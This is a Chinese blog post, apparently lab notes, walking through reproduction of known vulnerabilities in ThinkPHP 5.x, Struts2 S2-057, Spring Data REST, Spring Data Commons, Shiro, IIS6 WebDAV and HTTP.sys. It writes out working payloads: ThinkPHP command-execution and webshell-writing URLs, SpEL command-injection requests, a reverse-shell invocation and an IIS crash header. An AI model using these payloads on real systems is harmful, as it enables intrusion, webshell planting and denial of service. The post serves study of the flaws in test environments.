常见框架漏洞

已于 2024-08-07 21:04:03 修改
阅读量210 收藏
点赞数 11
文章标签: 安全 数据库 sql mysql web安全
于 2024-08-07 13:58:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53198216/article/details/140990060
版权

一、Thinkphp5x远程命令执行及getshell

1.进入环境页面

2.在地址栏后输入

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

执行远程代码执行

3.也可以执行

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

在网页查看phpinfo

4.进行getshell

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20"<?php%20phpinfo();?>"%20>>文件名

然后访问我们的文件

二、S2-057远程执行代码漏洞

1.搭建环境在地址栏后输入/struts2/showcase进入页面

2.在url处输入${(123+123)}/actionChain1.action后刷新可以看到中间数字位置相加了

3.将上面验证的payload值修改为我们的利用exp

三、Spring Data Rest 远程命令执行漏洞(CVE-2017-8046)

1.搭建环境进入customers/1

2.打开burp抓包,将GET修改为PATCH,添加字段 Content-Type: application/json-patch+json,再将制作好的payload添加到最后一行

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]

3.进⼊docker容器内查看是否执⾏命令

四、spring 代码执⾏ (CVE-2018-1273)

1.搭建环境后输入/users

2.输入账号密码进行抓包

3.在最后一行添加字段,把原来username那条字段删除

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/xxx")]=&password=&repeatedPassword=

4.进⼊docker容器内查看是否执⾏命令

五、Shiro rememberMe反序列化漏洞(Shiro-550)

1.搭建环境进入登录页面

2.打开工具进行爆破

3.可以输入系统命令

六、IIS6 PUT漏洞

1.开启 WebDAV 和写权限

2.把来宾账户修改权限为完全控制

3.打开抓包上传一句话木马

4.可以看到我们的木马文件上传成功了

5.使⽤MOVE命令将其更名为脚本⽂档后缀

6.打开软件测试连接成功

六、IIS RCE-CVE-2017-7269

1.kali先开启一个监听端口

2.反弹shell

python2 iis6 shell文件+iis服务器IP+端口号+kaliIP+端口号

3.可以看到监听成功

七、HTTP.SYS远程代码执⾏(MS15-034)

1.编辑请求头,增加Range: bytes=0-18446744073709551615字段返回 416 存在此漏洞

2.可以造成⼀个ddos的效果

POC: https://github.com/davidjura/MS15-034-IIS-Active-DoS-Exploit-PoC

3.这时候就可以看到虚拟机已经变卡了,甚⾄蓝屏

狂小霖
关注
  • 11
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java框架漏洞_Spring 框架漏洞集合
weixin_42514750的博客
02-25 5503
虽说是Spring框架漏洞,但以下包含并不仅Spring Framework,Spring Boot,还有Spring Cloud,Spring Data,Spring Security等。CVE-2010-1622 Spring Framework class.classLoader类远程代码执行影响版本:SpringSource Spring Framework 3.0.0 - 3.0.2、S...
web中间件常见漏洞总结.pdf
12-14
以下是对这些常见漏洞的详细总结: 1. **SQL注入**:当Web应用未能正确过滤或转义用户输入的数据时,攻击者可以插入恶意SQL语句,从而获取敏感信息、篡改数据甚至完全控制数据库。 2. **跨站脚本(XSS)**:XSS...
常见框架漏洞
m0_46467017的博客
08-20 8004
Shiro默认使用了CookieRememberMeManager, 其处理cookie的流程是: 得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化.然而AES的密钥是硬编码的, 密钥泄漏的根本原因是开发人员在开发过程中部分代码直接使用了网上的一些开源的项目代码,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。cookie的key为RemeberMe,cookie的值是经过对相关信息进⾏序列化,然后使⽤aes加密,最后在使⽤base64编码处理形成的。
JAVA常用框架漏洞
小小猪的博客
08-13 3696
三大语言常用框架漏洞 Java框架 1.MyBatis 是支持定制化 SQL、存储过程以及高级映射的优秀的持久层框架,其主要就完成2件事情: 封装JDBC操作 利用反射打通Java类与SQL语句之间的相互转换 MyBatis的主要设计目的就是让我们对执行SQL语句时对输入输出的数据管理更加方便,所以方便地写出SQL和方便地获取SQL的执行结果才是MyBatis的核心竞争力。 ...
PHP常用框架漏洞
小小猪的博客
08-14 2949
PHP常用框架漏洞 PHP框架 laraval介绍: Laravel基于MVC架构,可以满足诸如事件处理、用户身份验证等各种需求,同时通过包管理实现模块化和可扩展的代码,并且对数据库管理有着健壮的支持。 漏洞: 1. Laravel 配置文件泄露 2. Laravel <= 8.4.2 存在远程代码执行漏洞 3. Laravel 存在SQL注入漏洞 4. Laravel 反序列化漏洞 CakePHP 介绍: ...
Spring框架漏洞合集
小小猪的博客
08-18 7896
Spring框架漏洞合集 Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977) 访问路径/oauth/authorize,会看到左上角有个绿色叶子的标志,一般都是spring或者springboot 直接打poc,可以看到有el表达式注入的形式 /oauth/authorize?response_type=${2*3}&client_id=acme&scope=openid&redirect_uri=http://test 如果要
常见漏洞利用框架整理
Python_0011的博客
12-31 1122
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
常见web中间件&java框架漏洞&总结
bobo_milk的博客
05-21 1171
对近期的web中间件漏洞进行了解。因此我对常见web中间件漏洞进行了收集以及整理。(本篇文章将持续更新) 文章目录 一、IIS 二、Apache 三、Nginx 四、Tomcat 一、IIS IIS6.x 解析漏洞 原理:服务器默认不解析; 号及其后面的内容,相当于截断 *.asp;.jpg的文件会当成asp文件执行;/*.asp文件夹下的文件也会被当作asp脚本执行 另外,IIS6.x除了会将扩展名为....
Hibernate及JSF框架漏洞
小小猪的博客
08-18 1288
Hibernate框架漏洞 Hibernate框架中的HQL注入漏洞 Hibernate是一种ORMapping框架,内部可以使用原生SQL还有HQL语言进行SQL操作。 所谓的HQL注入,就是指在Hibernate中没有对数据进行有效的验证导致恶意数据进入应用程序中造成的。 请看这段代码: Input参数即可造成注入。 不过在Hibernate中,一般都是在createQuery中使用PDO,使用setString填充占位符进行sql语句的拼接,如果是这样的话,自然就不存在SQL注入.
Spring框架漏洞
weixin_68408599的博客
12-11 1381
以下框架漏洞均为Spring的框架,讲解方式为漏洞产生原因以及漏洞复现,重点是漏洞复现的具体过程。
常见漏洞利用exphub
01-23
Exphub是一个汇聚了多种常见Web安全漏洞利用代码的开源项目,主要面向网络安全研究者、渗透测试人员以及安全教育从业者。这个项目的目的是提供一个学习和实践的平台,帮助用户了解和掌握不同类型的Web应用程序漏洞的...
常见网站漏洞及其防御
05-17
- **定期更新**:保持网站及其所有组件(如插件、框架)的最新状态,及时修补已知的安全漏洞。 - **安全扫描**:定期使用专业的安全工具对网站进行全面扫描,查找潜在的安全漏洞。 - **防火墙和入侵检测系统**:部署...
程序员常见WEB安全漏洞2022优秀文档.pptx
11-14
程序员常见WEB安全漏洞2022优秀文档 在这个优秀的文档中,我们将讨论程序员常见Web安全漏洞,包括SQL注入攻击和跨站脚本攻击(XSS)。这两个漏洞都是非常常见Web安全漏洞,对于程序员来说非常重要。 SQL注入...
NFine快速开发框架
04-23
4. **通用后台管理系统**:NFine框架提供了常见的后台管理功能,如权限管理、菜单管理、角色管理等,这些模块化的设计让开发者可以快速搭建一套完整的后台系统,同时支持自定义扩展,满足不同项目的需求。...
typechov漏洞.zip
08-10
“typechov漏洞.zip”这个标题提到了一个特定的安全漏洞,即Typecho框架中的一个名为“typechov”的漏洞。Typecho是一个流行的开源博客平台,由PHP编写。"漏洞"一词表明这是一个关于软件安全问题的文章,而“zip”则...
常见WEB漏洞整理-CSRF
06-11
适合由于初学者进行框架了解,和大师傅们进行回顾
openapi自定义验证框架
07-20
- 提升安全性能:验证框架可以帮助检测潜在的安全漏洞,如SQL注入、跨站脚本等。 - 提升用户体验:通过及时反馈错误信息,用户可以更快地修正问题,提升API的易用性。 - 简化文档:自定义验证规则可以直接体现在...
PHP常见安全漏洞攻防研究.pdf
最新发布
01-05
"PHP常见安全漏洞攻防研究" PHP 是一种广泛使用的服务器端脚本语言,拥有强大功能和灵活的语法,使得 Web 开发者能够快速开发包含动态页面的 Web 应用程序。然而,由于 PHP 对开发人员要求很低和开发人员的疏忽,...
常见框架以及框架漏洞
10-17
常见Web框架有Spring、Django、Flask等,这些框架都有其特点和优缺点。在使用这些框架时,需要注意一些常见漏洞,比如SQL注入、XSS攻击、CSRF攻击等。 其中,SQL注入是指攻击者通过在输入框中输入恶意的SQL语句,从而获取或篡改数据库中的数据。XSS攻击是指攻击者通过在网页中注入恶意脚本,从而获取用户的敏感信息或者进行其他恶意操作。CSRF攻击是指攻击者通过伪造用户的请求,从而进行一些非法操作。 为了防止这些漏洞,我们可以采取一些措施,比如使用参数化查询来防止SQL注入,使用输入验证和输出编码来防止XSS攻击,使用CSRF Token来防止CSRF攻击等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值